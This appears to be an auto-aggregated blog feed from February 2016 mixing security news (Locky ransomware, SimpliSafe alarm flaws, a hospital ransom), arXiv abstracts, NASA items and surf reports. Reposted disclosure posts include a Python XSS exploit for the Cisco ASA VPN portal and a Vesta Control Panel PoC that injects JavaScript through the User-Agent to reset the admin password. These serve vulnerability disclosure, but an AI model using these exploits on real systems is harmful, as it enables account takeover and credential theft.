As with the present scenario, reports say that the boy could be extradited to the United States to face the Intrusion and hacking charges.

Second Member of the Hacking Group Arrested


The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.

Another member of the same group got arrested from the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI confidential.

The hacktivist group "Cracka with Attitude" is behind a series of hacks on the United States government and its high-level officials, including:

Last Member of Hacking Group Left

Cracka-with-Attitude
Additionally, it is assumed that only one more member (with a pseudonym "Thwarting Exploits") has been left in the CWA group to get busted, as this got evident from his tweet finalizing the fact that it is a the third member of the group.

Nowadays, the amateurish approach of teenage hackers are hunting down the world's greatest Crime solvers such as FBI and CIA.

The busted cyber criminals are liable to spend their rest of the life behind bars. The cyber laws are strict enough; that it would eat up your whole life years and even beyond your lifetime sometimes.


from The Hacker News http://ift.tt/1XBrBnQ
via IFTTT

Sexaholics Anonymous

I am considering starting a local chapter of the Sexaholics Anonymous Group to meet in the Barre area. As an update, I did in fact get permission to ...

from Google Alert - anonymous http://ift.tt/1KYX3KJ
via IFTTT

How Just Opening an MS Word Doc Can Hijack Every File On Your System

ransomware-hacking-windows-computer
If you receive a mail masquerading as a company's invoice and containing a Microsoft Word file, think twice before clicking on it.

Doing so could cripple your system and could lead to a catastrophic destruction.

Hackers are believed to be carrying out social engineering hoaxes by adopting eye-catching subjects in the spam emails and compromised websites to lure the victims into installing a deadly ransomware, dubbed "Locky," into their systems.

So if you find .locky extension files on your network shares, Congratulations! You are infected and left with just two solutions: Rebuild your PC from scratch or Pay the ransom.

Microsoft MACROS are Back


It is hard to digest the fact that, in this 2016, even a single MS Word document could compromise your system by enabling 'Macros.'

This is where the point to appreciate hacker's sheer brilliance of tactics.
phishing-email-Locky Ransomware
Locky ransomware is being distributed via Microsoft 365 or Outlook in the form of an Invoice email attachment (Word File that embeds vicious macro functions).

The concept of macros dates back to 1990s. You must be familiar with this message: "Warning: This document contains macros."

Now macros are back, as cyber criminals discover a new way to get internet users to open Microsoft Office documents, especially Word files that allow macros to run automatically.

How Does Locky Work?


locky-ransomware-derypt
Once a user opens a malicious Word document, the doc file gets downloaded to its system. However, danger comes in when the user opens the file and found the content scrambled and a popup that states "enable macros".

Here comes the bad part:
  • Once the victim enables the macro (malicious), he/she would download an executable from a remote server and run it.
  • This executable is nothing but the Locky Ransomware that, when started, will begin to encrypt all the files on your computer as well as network.
Locky ransomware affects nearly all file formats and encrypts all the files and replace the filename with .locky extension.

Once encrypted, the ransomware malware displays a message that instructs infected victims to download TOR and visit the attacker's website for further instructions and payments.

Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key.

One of the interesting note on Locky is that it is being translated into many languages, which heighten its attack beyond English boundaries to maximize the digital casualties.

Locky Encrypts Even Your Network-Based Backup Files


The new ransomware also has the capability to encrypt your network-based backup files. So it's time for you to keep you sensitive and important files in a third party storage as a backup plan in order to evade future-ransomware infections.

A researcher named Kevin Beaumont along with Larry Abrahms of BleepingComputer initially discovered the existence of Locky encrypted virus.

To check the impact of Locky, Kevin successfully intercepted the Locky traffic yesterday and realized that the cryptovirus is spreading out rapidly in the wild.
"I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of Million PCs will be infected," Kevin said in a blog post.

One hour of infection Statistics:

locky-ransomware
Among the highly impacted countries include Germany, Netherlands, United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia.


from The Hacker News http://ift.tt/212nUwV
via IFTTT

Daily Caller Report: Porn, Weed, DUIs All In A Day's Anonymous

WASHINGTON, D.C. - U.S. Congressman Paul A. Gosar, D.D.S. (AZ-04) released the following statement after the Environmental Protection Agency ...

from Google Alert - anonymous http://ift.tt/1LwuHT3
via IFTTT

SDO Year 6: A Year of the Sun

A view of the sun from Solar Dynamics Observatory (SDO) in 171 Angstroms. Each frame of this animation corresponds to one hour. During this run, we see a host of other events during the course of the year.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

March 2016 Eclipse Shadow Cones

A solar eclipse occurs when the Moon's shadow falls on the Earth. The shadow comprises two concentric cones called the umbra and the penumbra. Within the smaller, central umbra, the Sun is completely blocked by the Moon, and anyone inside the umbra sees a total eclipse. Within the larger penumbra, the Sun is only partially blocked. In this animation, the umbra and penumbra cones are viewed through a telescopic lens on a virtual camera located far behind the Moon. Long focal lengths like the one used here appear to compress the distance between near and far objects. Despite appearances, the geometry of the scene is correct. The Earth is roughly 104 lunar diameters beyond the Moon, and the angle at the apex of the umbral cone is only about half a degree. From this point of view directly behind the Moon, the edges of the shadow cones look circular. The edge of the penumbra is outlined in yellow. It passes over Southeast Asia, Australia, and southern China before crossing the Pacific Ocean and reaching Hawaii. The path of the umbra (the small black dot) leads through Indonesia and over the tiny Woleai atoll in Micronesia.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Hitomi Launches


On February 17 at 5:45pm JST this H-IIA rocket blasted skyward from JAXA's Tanegashima Space Center located off the southern coast of Japan, planet Earth. Onboard was the ASTRO-H X-ray astronomy satellite, now in orbit. Designed to explore the extreme cosmos from black holes to massive galaxy clusters, the satellite observatory is equipped with four cutting-edge X-ray telescopes and instruments sensitive to photon energies from 300 to 600,000 electron volts. By comparison, visible light photon energies are 2 to 3 electron volts. Following a tradition of renaming satellites after their successful launch, ASTRO-H has been newly dubbed "Hitomi", inspired by an ancient legend of dragons. Hitomi means "the pupil of the eye". via NASA http://ift.tt/1Qo1pqI

Thursday, February 18, 2016

I have a new follower on Twitter


Torbjörn Ungvall
Renegade, Disruptive Thinker, Social Media Explorer, BI rockstar, Storyteller, @Hootsuite Ambassador, and Singer. In that order. Opinions are my own…
Stockholm, Sweden
http://t.co/AgDPhnNcwR
Following: 7371 - Followers: 10498

February 18, 2016 at 11:31PM via Twitter http://twitter.com/Ungvall

Query Answering with Inconsistent Existential Rules under Stable Model Semantics. (arXiv:1602.05699v1 [cs.AI])

Traditional inconsistency-tolerent query answering in ontology-based data access relies on selecting maximal components of an ABox/database which are consistent with the ontology. However, some rules in ontologies might be unreliable if they are extracted from ontology learning or written by unskillful knowledge engineers. In this paper we present a framework of handling inconsistent existential rules under stable model semantics, which is defined by a notion called rule repairs to select maximal components of the existential rules. Surprisingly, for R-acyclic existential rules with R-stratified or guarded existential rules with stratified negations, both the data complexity and combined complexity of query answering under the rule {repair semantics} remain the same as that under the conventional query answering semantics. This leads us to propose several approaches to handle the rule {repair semantics} by calling answer set programming solvers. An experimental evaluation shows that these approaches have good scalability of query answering under rule repairs on realistic cases.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1orHMrw
via IFTTT

Applying Boolean discrete methods in the production of a real-valued probabilistic programming model. (arXiv:1602.05705v1 [cs.AI])

In this paper we explore the application of some notable Boolean methods, namely the Disjunctive Normal Form representation of logic table expansions, and apply them to a real-valued logic model which utilizes quantities on the range [0,1] to produce a probabilistic programming of a game character's logic in mathematical form.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1TpnM4o
via IFTTT

Entity Embeddings with Conceptual Subspaces as a Basis for Plausible Reasoning. (arXiv:1602.05765v1 [cs.AI])

Conceptual spaces are geometric representations of conceptual knowledge, in which entities correspond to points, natural properties correspond to convex regions, and the dimensions of the space correspond to salient features. While conceptual spaces enable elegant models of various cognitive phenomena, the lack of automated methods for constructing such representations have so far limited their application in artificial intelligence. To address this issue, we propose a method which learns a vector-space embedding of entities from Wikipedia and constrains this embedding such that entities of the same semantic type are located in some lower-dimensional subspace. We experimentally demonstrate the usefulness of these subspaces as (approximate) conceptual space representations by showing, among others, that important features can be modelled as directions and that natural properties tend to correspond to convex regions.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1orHLUy
via IFTTT

A General Modifier-based Framework for Inconsistency-Tolerant Query Answering. (arXiv:1602.05828v1 [cs.AI])

We propose a general framework for inconsistency-tolerant query answering within existential rule setting. This framework unifies the main semantics proposed by the state of art and introduces new ones based on cardinality and majority principles. It relies on two key notions: modifiers and inference strategies. An inconsistency-tolerant semantics is seen as a composite modifier plus an inference strategy. We compare the obtained semantics from a productivity point of view.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1TpnM4l
via IFTTT

Toward Deeper Understanding of Neural Networks: The Power of Initialization and a Dual View on Expressivity. (arXiv:1602.05897v1 [cs.LG])

We develop a general duality between neural networks and compositional kernels, striving towards a better understanding of deep learning. We show that initial representations generated by common random initializations are sufficiently rich to express all functions in the dual kernel space. Hence, though the training objective is hard to optimize in the worst case, the initial weights form a good starting point for optimization. Our dual view also reveals a pragmatic and aesthetic perspective of neural networks and underscores their expressive power.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1SD95fc
via IFTTT

A partial taxonomy of judgment aggregation rules, and their properties. (arXiv:1502.05888v2 [cs.AI] UPDATED)

The literature on judgment aggregation is moving from studying impossibility results regarding aggregation rules towards studying specific judgment aggregation rules. Here we give a structured list of most rules that have been proposed and studied recently in the literature, together with various properties of such rules. We fi?rst focus on the majority-preservation property, which generalizes Condorcet-consistency, and identify which of the rules satisfy it. We study the inclusion relationships that hold between the rules. Finally, we consider two forms of unanimity, monotonicity, homogeneity, and reinforcement, and we identify which of the rules satisfy these properties.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1JALlVi
via IFTTT

Ravens: Cutting TE Dennis Pitta and CB Lardarius Webb are among moves team should make this offseason - Bill Barnwell (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Anonymous Emails From Suspected Child Predator Targeting Sacramento Daycare

She says it started out as an innocent inquiry into her services, but it quickly exploded into child pornography, extortion and even threats.

from Google Alert - anonymous http://ift.tt/1mKKOWz
via IFTTT

Ravens: Ohio State DE Joey Bosa goes No. 6 overall in Mel Kiper's Mock Draft 2.0; \"the best player on the board here\" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] EBAY Bugbounty: Persistent DOM Based XSS on ebay.com

Hello all, Description: Persistent DOM based Cross Site Scripting on ebay.com domain. Disclosed to Ebay: January 2015 Fixed: February 2016 Vulnerability location: Every listing Who are able to create: Sellers Same origin policy bypass via postMessage Write-up: http://ift.tt/1Qn0Bc4 Proof of Concept: this code is inserted to the listing to pop-up alert on ebay.com domain.

Source: Gmail -> IFTTT-> Blogger

[FD] Cisco ASA VPN - Zero Day Exploit

# Exploit author: Juan Sacco - jsacco@exploitpack.com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page. # This vulnerability can be used by an attacker to capture other user's credentials. # The password recovery form fails to filter properly the hidden inputs fields. # # This Zero Day exploit has been developed and discovered by Juan Sacco. # Exploit Pack - Team http://exploitpack.com # # Release Dates: # Reported to Cisco PSIRT Feb 4/2016 # Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here: http://ift.tt/1RaagQ5 # More than 18.000 results in Google only import string, sys import socket, httplib import telnetlib def run(): try: Target = sys.argv[1] Port = int(sys.argv[2]) # Here goes your custom JS agent code Payload = "alert(1)" VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" CraftedRequest = VulnerableURL # Start the connection connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable" for line in str(data).splitlines(): if "juansacco\\\"" in line: vulnerable = "Targer is vulnerable" if vulnerable != "Not vulnerable": print "Result of the test:", vulnerable # Find the injection on the response connection.close() except Exception,e: print "Exploit connection closed " + str(e) if __name__ == '__main__': print "Cisco VPN ASA Exploit - Zero Day" print "################################" print "Author: Juan Sacco - jsacco@exploitpack.com" try: Target = sys.argv[1] Port = sys.argv[2] except IndexError: pass run()

Source: Gmail -> IFTTT-> Blogger

Anonymous Oscar Voter Reveals Winner Predictions

The anonymous Oscar voter is quoted as saying, “Sometimes I'm watching him and I don't see him as a grown-up… but he really took over this role."

from Google Alert - anonymous http://ift.tt/1Uakvqr
via IFTTT

The Anonymous People

23, Dalton State College will host a free screening of the 2013 documentary film, “The Anonymous People” about the daily walk of recovery.

from Google Alert - anonymous http://ift.tt/1PTvCPi
via IFTTT

[FD] Umbraco - The open source ASP.NET CMS Multiple Vulnerabilities

[FD] CVE-2016-2046 Cross Site Scripting in Sophos UTM 9

-------

Source: Gmail -> IFTTT-> Blogger

[FD] Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability

# Exploit Titleб═б═б═б═ :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability# Vendor Homepageб═б═ :http://www.vestacp.com# Versionб═б═б═б═б═б═б═б═б═б═ :0.9.8-15# Exploit Authorб═б═б═ :Necmettin COSKUN @babayarisiб═# Blogб═б═б═б═б═б═б═б═б═б═б═б═б═ :http://ha.cker.io# Discovery dateб═б═б═ :16/02/2016# Tested on :Fedora23 - Chrome/Firefox/Maxthon We can use user-agent information to attack website like this. First of all we change our user-agent and add some dangerous javascript code ( XSS etc. ) and then we request to one of the website on target server then it is saved on access.log by server so when Administrator reads it the javascript code works that we added our user-agent information. Poc Exploit================1.Prepare evil js file function csrfWithToken(url,hanimisToken,password){ $.get(url, function(gelen) { $('body').append($(gelen)); $('form[id="vstobjects"]').css("display","none"); var token = $(hanimisToken).attr("token"); $('form[id="vstobjects"]').attr("action",url); $('input[name="v_password"]').val(password); $('form[id="vstobjects"]').submit(); });};//password = 1234567csrfWithToken("/edit/user/?user=admin","#token","123456"); 2. Make a Get request with evil user-agent to victim serverwget --header="Accept: text/html" --user-agent="" http://victimserver3. We wait Administrator to read access.log that injected our evil.js4. We log-in VestaCP via password we changedhttp(s)://victim:8083/б═б═б═б═Discovered by:================Necmettin COSKUNб═ |GrisapkaGuvenlikGrubu|4ewa2getha!

Source: Gmail -> IFTTT-> Blogger

Ocean City, MD's surf is at least 5.96ft high

Maryland-Delaware, February 24, 2016 at 08:00AM

Ocean City, MD Summary
At 2:00 AM, surf min of 4.46ft. At 8:00 AM, surf min of 5.96ft. At 2:00 PM, surf min of 2.9ft. At 8:00 PM, surf min of 2.14ft.

Surf maximum: 7.13ft (2.17m)
Surf minimum: 5.96ft (1.82m)
Tide height: 3.55ft (1.08m)
Wind direction: SW
Wind speed: 16.99 KTS


from Surfline http://ift.tt/1kVmigH
via IFTTT

ISS Daily Summary Report – 02/17/16

Biological Rhythms 48-Hour:  Kelly began his third and final Biological Rhythms experiment today, preparing and starting the Actiwatch and donning a Holter Monitor to collect Electrocardiogram (ECG) measurements for 48 hours.  Biological Rhythms 48 hours studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. While the ISS station maintains Greenwich Mean Time (GMT) as its time zone, it remains unknown whether a separate biological rhythm is imposed on long-term flight crews. To study this astronauts wear an Actiwatch sleep monitor for 96 hours and a Holter electrocardiograph for 48 hours in the middle of that sequence.   Cardio Ox:  Kopra, with Peake as the operator, performed a Flight Day 60 Cardio Ox ultrasound measurement session. The goal of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis risk in astronauts. Twelve crewmembers provide blood and urine samples to assess biomarkers before launch, 15, and 60 days after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans of the carotid and brachial arteries are obtained at the same time points, as well as through 5 years after landing, as an indicator of cardiovascular health.   Ocular Health Testing:  Today Kopra and Peake completed their Flight Day 60 Ocular Health testing by performing ocular and cardiac ultrasound scans.  The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.   Russian Joint Research (RJR) Microbiological Sampling:  Today Kornienko used the Microbial Air Sampler (MAS) and Surface Sample Kit (SSK) to take surface and air samples in the ISS to support a microbiological assessment of the ISS.  These activities are performed as part of a joint cooperative research program between NASA and the Russian Space Agency. The results of incubation and analysis of these samples will be used to identify ISS locations and surfaces prone to microbial contamination and will provide a scientific basis for decisions about future microbial monitoring on ISS and on future spacecraft used for human exploration.   Orbital ATK (OA)-4 Departure Preparation:  Kelly and Kopra reviewed material associated with Cygnus departure then utilized a Robotic Trainer in order to practice nominal and off nominal release scenarios.   Later in the afternoon the crew completed transferring US and Russian trash into the Cygnus vehicle in preparation for Friday’s departure.   ISS Reboost:  This morning, the ISS successfully performed a reboost using the Progress 61 thrusters.  The burn duration was 11 minutes long in order to achieve a delta-V of 1.05 meters per second.  This reboost was the third in a series of reboosts to target the planned conditions for Soyuz 44 landing and Soyuz 46 4-Orbit Rendezvous next month.   Today’s Planned Activities All activities were completed unless otherwise noted. BIOME – Questionnaire Completion BLR48 – Card Preparation Russian Joint Research (RJR) – Collecting Surface Samples using SSK Gathering Node 1 Nadir CBM Controller Panel Assembly (CPA) Crew Departure Prep Closing USOS Window Shutters Ocular Health (OH) – Prep for Ultrasound Scan Ocular Health (OH) – Ultrasound Scans Ocular Health (OH) – Ultrasound 2 Scans Closing window 6,8,9,12,13,14 shutters LBNP Exercise (PRELIMINARY) Ocular Health (OH) – Ultrasound 2 Data Export Changeout of СРВ-К2М purification column assembly (БКО) FPEF – Connector Removal Ocular Health (OH) –  Ultrasound 2 Scan (Closeout Ops) Onboard Training (OBT) – Cygnus Release and Departure Review Transferring Data from Cargo Environment Sensor Changeout of СРВК-2М Water Conditioning Unit Purification Columns (БК БКВ) OH – Ocular Health Cardiac Operations Ocular Health (OH) – Operator Assistance with the Experiment BLR48 – Setup/Don Hardware and Start Video Recording Complete the Dose Tracker Application – Subject BLR48 – Electrode Placement (Operator) CARDOX – Experiment Ops Flushing Water conditioning unit purification columns (БК БКВ) – Start LBNP Exercise (PRELIMINARY) Handover of Russian Cargo Items to US crew for disposal via Cygnus Hardware prepack for return and disposal on Soyuz 718 Russian Joint Research (RJR) – Microbiology Air Sampling (MAS) on the ISS Cygnus Cargo Operations USND2 – Hardware Deactivation HABIT – Experiment Ops JRNL – Journal Entry Onboard Training (OBT) – Cygnus OBT-ROBoT RELEASE СОЖ Maintenance Crew Departure Prep Cygnus Cargo Operations Changeout of Dust Filter ПФ1-4 Cartridges in SM (ФГБ1ПГО_4_419_1 bag 431-7 CIR – Upper Rack Doors Open CIR – Hardware Removal and Relocation Hardware prepack for return and disposal on Soyuz 718 CIR – Upper Rack Doors Close CONTENT. Experiment Ops IMMUNO. Preparing Saliva-Immuno Kit for the experiment Cygnus cargo conference VEG-01 – Equipment Deactivation Increment 45 Plaque Hanging On MCC GO Flushing Water conditioning unit purification columns (БК БКВ) – Terminate   Completed Task List Items Storytime – Sea Level   Ground Activities All activities were completed unless otherwise noted. Nominal System Commanding System Commanding associated with ISS Reboost   Three-Day Look Ahead: Thursday, 02/18:  Node 1 CPA Install, Cygnus Hatch Closure, Microbiome, Cognition Test, RWS DCP Checkout, ELF Cartridge Install Friday, 02/19: OA-4 unberth, EMU water conductivity test, Neuromapping setup Saturday, 02/20:  Crew Off Duty,  Weekly Cleaning   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Override Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1Tscvlj
via IFTTT

Confusion About Lambdas, Anonymous Functions and First Class Functions

The difference, I think, between anonymous and first-class functions is that anonymous functions are functions that aren't bound to an identifier ...

from Google Alert - anonymous http://ift.tt/1ToopeH
via IFTTT

Using SimpliSafe Home Security? — You're Screwed! It's Easy to Hack & Can't be Patched

hacking-smart-home-security
If you are using a SimpliSafe wireless home alarm system to improve your home security smartly, just throw it up and buy a new one. It is useless.

The so-called 'Smart' Technology, which is designed to make your Home Safer, is actually opening your house doors for hackers. The latest in this field is SimpliSafe Alarm.

SimpliSafe wireless home alarm systems – used by more than 300,000 customers in the United States – are Hell Easy to Hack, allowing an attacker to easily gain full access to the alarm and disable the security system, facilitating unauthorized intrusions and thefts.

…and the most interesting reality is: You Can Not Patch it!

As the Internet of Things (IoT) is growing at a great pace, it continues to widen the attack surface at the same time.

Just last month, a similar hack was discovered in Ring – a Smart doorbell that connects to the user's home WiFi network – that allowed researchers to hack WiFi password of the home user.

How to Hack SimpliSafe Alarms?


According to the senior security consultant at IOActive Andrew Zonenberg, who discovered this weakness, anyone with basic hardware and software, between $50 and $250, can harvest alarm's PIN and turn alarm OFF at a distance of up to 200 yards (30 meters) away.

Since SimpliSafe Alarm uses unencrypted communications over the air, thief loitering near a home with some radio equipment could sniff the unencrypted PIN messages transferred from a keypad to the alarm control box when the house owner deactivates the alarm.

The attacker then records the PIN code on the microcontroller board's memory (RAM) and later replay this PIN code to disable the compromised alarm and carry out burglaries when the owners are out of their homes.

Moreover, the attacker could also send spoofed sensor readings, like the back door closed, in an attempt to fool alarm into thinking no break-in is happening.

Video Demonstration of the Hack


You can watch the video demonstration that shows the hack in work:


"Unfortunately, there's no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening," Zonenberg explains.

Here's Why Your Smart Alarms are Unpatchable


Besides using the unencrypted channel, SimpliSafe also installs a one-time programmable chip in its wireless home alarm, leaving no option for an over-the-air update.

"Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol," Zonenberg adds. But, "this isn't an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable."

This means there is no patch coming to your SimpliSafe Alarm, leaving you as well as over 300,000 homeowners without a solution other than to stop using SimpliSafe alarms and buy another wireless alarm systems.

Zonenberg said he has already contacted Boston-based smart alarm provider several times since September 2015, but the manufacturer has not yet responded to this issue. So, he finally reported the issue to US-CERT.


from The Hacker News http://ift.tt/1Xzueq3
via IFTTT

Ocean City, MD's surf is Good

February 17, 2016 at 07:00PM, the surf is Good!

Ocean City, MD Summary


Surf: head high to 1 ft overhead
Maximum: 1.836m (6.02ft)
Minimum: 1.53m (5.02ft)

Maryland-Delaware Summary


from Surfline http://ift.tt/1kVmigH
via IFTTT

Hollywood Hospital Pays $17,000 Ransom to Hacker for Unlocking Medical Records

ransomware-medical-record
Ransomware has seriously turned on to a noxious game of Hackers to get paid effortlessly.

Once again the heat was felt by the Los Angeles-based Presbyterian Medical Center when a group of hackers had sealed all its sensitive files and demanded $17,000 USD to regain the access to those compromised data.

The devastation of the compromised files can be pitched as:
  • Compromised emails
  • Lockout Electronic Medical Record System [EMR]
  • Encrypted patient data
  • Unable to carry CT Scans of the admitted patients
  • Ferried risky patients to nearby hospitals
...and much more unexplained outcomes.

The hospital had confirmed that the Ransomware malware had hit its core heart a week before, potentially affecting the situation to grow much worse.

Hospital End up Paying $17,000


As the situation was grown out of wild, the hospital paid 40 Bitcoins (Roughly US $17,000) to the Ransomware Criminals to resume their medical operations after gaining the decryption keys.
"The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key," the hospital CEO Allen Stefanek said in a letter.
All the electronic medical system were restored back soon after unlocking the encrypted file locks.

The Ransomware had stolen the nights of many network administrators, as they would be often blamed to fight up this nasty threat; instead of blaming staffs who click the illegit links in their e-mail.

The FBI Advises Victims to Just Pay the Ransom


Last year, even the FBI advised paying off the Ransom amount to the ransomware criminals as they had not come up with any other alternatives.

Several companies had got webbed in the Ransomware business including a US Police Department that paid US $750 to ransomware criminals three years back.

Criminals often demand the ransom in BTC (their intelligent move) for the surety of not getting caught, as Bitcoin transactions are non-trackable due to its decentralized nature.

So until and unless a permanent solution evolves, users are requested not to click malicious or suspected links sent via an unknown person.

The frequent payment to Ransomware encourages the hackers in the dark to stash the cash and develop a more enticing framework for the next target.

But affecting a medical system is a heinous crime as hospitals are acting as a bridge between life and heaven.


from The Hacker News http://ift.tt/1Ohy00g
via IFTTT

Apple vs. FBI — Google Joins Tim Cook in Encryption Backdoor Battle

Apple vs. FBI — Google CEO Joins Apple in Encryption Backdoor Battle
In the escalating battle between the Federal Bureau of Investigation (FBI) and Apple over iPhone encryption, former National Security Agency (NSA) contractor Edward Snowden and Google chief executive Sundar Pichai just sided with Apple's refusal to unlock iPhone.

Yesterday, Apple CEO Tim Cook refused to comply with a federal court order to help the FBI unlock an iPhone owned by one of the terrorists in the mass shootings in San Bernardino, California, in December.

Here's What the FBI is Demanding:


The federal officials have asked Apple to make a less secure version of its iOS that can be used by the officials to brute force the 4-6 digits passcode on the dead shooter's iPhone without getting the device's data self-destructed.

Cook called the court order a "chilling" demand that "would undermine the very freedoms and liberty our government is meant to protect." He argued that to help the FBI unlock the iPhone would basically providing an Encryption Backdoor that would make the products less secure.

Backdoor for Government, Backdoor for All


However, Apple is worried that once this backdoor gets created and handed over to the FBI, there would be chances that the backdoor will likely get into the hands of malicious hackers who could use it for evil purposes.

Although many politicians, including Donald Trump, have slammed Apple's decision, Google has stepped up and taken a public stand in support of Apple's decision.

"I agree 100 percent with the courts," Trump said in a statement. "But to think that Apple won't allow us to get into her cell phone, who do they think they are? No, we have to open it up."

Google Sided with Apple


In a series of tweets late Wednesday, Pichai sided with Apple while saying "forcing companies to enable hacking could compromise users' privacy" and "requiring companies to enable hacking of customer devices & data. Could be a troubling precedent."

However, Pichai took more than 12 hours to talk about this burning issue, after Edward Snowden pointed out that Google had not yet stepped forward to speak up on his stand.

"The @FBI is creating a world where citizens rely on #Apple to defend their rights, rather than the other way around," Snowden tweeted on Wednesday. Snowden called on Google to stand with Apple, saying, "This is the most important tech case in a decade."

Pichai's stance is basically: 


The technology companies will give its customers' data to law enforcement when it is required to, but the companies will not put in a "Backdoor" for the government.

While the statements made by Pichai is not quite as forceful as Cook's statement published in an open letter to its customers, we can assume both Google and Apple are together, at least in the sense that the federal agencies are asking too much.


from The Hacker News http://ift.tt/1Q2OpLw
via IFTTT

Anonymous function/ Loop

Hello,. I'm trying to solve an anonymous function with fzero but with one of the variable being a vector. So if w = linspace(0,1,500);. And my anonymous ...

from Google Alert - anonymous http://ift.tt/1U9w559
via IFTTT

Ignoring "make known users anonymous"

Ignoring "make known users anonymous" (1 post). rperrett. Member Posted 20 minutes ago #. Hi,. This used to be working so I'm going to assume that ...

from Google Alert - anonymous http://ift.tt/1WsZLsI
via IFTTT

Anonymous

Anonymous. see more options Embed Code. <iframe width="100%" height="300" style="background-color:transparent; display:block; max-width: ...

from Google Alert - anonymous http://ift.tt/1U9w557
via IFTTT

Milky Way over the Pinnacles in Australia


What strange world is this? Earth. In the foreground of the featured image are the Pinnacles, unusual rock spires in Nambung National Park in Western Australia. Made of ancient sea shells (limestone), how these human-sized picturesque spires formed remains unknown. In the background, just past the end of the central Pinnacle, is a bright crescent Moon. The eerie glow around the Moon is mostly zodiacal light, sunlight reflected by dust grains orbiting between the planets in the Solar System. Arching across the top is the central band of our Milky Way Galaxy. Many famous stars and nebula are also visible in the background night sky. The featured 29-panel panorama was taken and composed last September after detailed planning that involved the Moon, the rock spires, and their corresponding shadows. Even so, the strong zodiacal light was a pleasant surprise. via NASA http://ift.tt/1Sy9BuV

March 2016 Total Solar Eclipse Path

On Wednesday, March 9, 2016 (Tuesday evening in the Americas), the Moon will pass in front of the Sun, casting its shadow across Southeast Asia and the western Pacific. The shadow crosses the International Date Line, entering March 8, and passes Hawaii before it slides off the edge of the Earth. The Moon's shadow can be divided into areas called the umbra and the penumbra. Within the penumbra, the Sun is only partially blocked, and observers experience a partial eclipse. The much smaller umbra lies at the very center of the shadow cone, and anyone there sees the Moon entirely cover the Sun in a total solar eclipse. In the animation, the umbra is the small black oval. The red streak behind this oval is the path of totality. Anyone within this path will see a total eclipse when the umbra passes over them. The much larger shaded bullseye pattern represents the penumbra. Steps in the shading denote different percentages of Sun coverage (eclipse magnitude), at levels of 90%, 75%, 50% and 25%. The yellow and orange contours map the path of the penumbra. The outermost yellow contour is the edge of the penumbra path. Outside this limit, no part of the Sun is covered by the Moon. The numbers in the lower left corner give the latitude and longitude of the center of the umbra as it moves eastward, along with the altitude of the Sun above the horizon at that point. Also shown is the duration of totality: for anyone standing at the center point, this is how long the total solar eclipse will last. Note that the duration varies from just 2 minutes over eastern Indonesia to over 4 minutes on the Woleai Atoll in Micronesia. Go here for details about the methods and parameters used to make this animation.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Wednesday, February 17, 2016

I have a new follower on Twitter


Horoscope Cancer
Rejoins la #TeamCancer et découvres ce que cache ton signe astrologique #Astro #Cancer #Horoscope
Ici et là-bas

Following: 7227 - Followers: 9275

February 17, 2016 at 09:36PM via Twitter http://twitter.com/_Le_Cancer

Orioles: Team continues to make progress in contract talks with SP Yovani Gallardo and OF Dexter Fowler - sources (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

BioSpaun: A large-scale behaving brain model with complex neurons. (arXiv:1602.05220v1 [q-bio.NC])

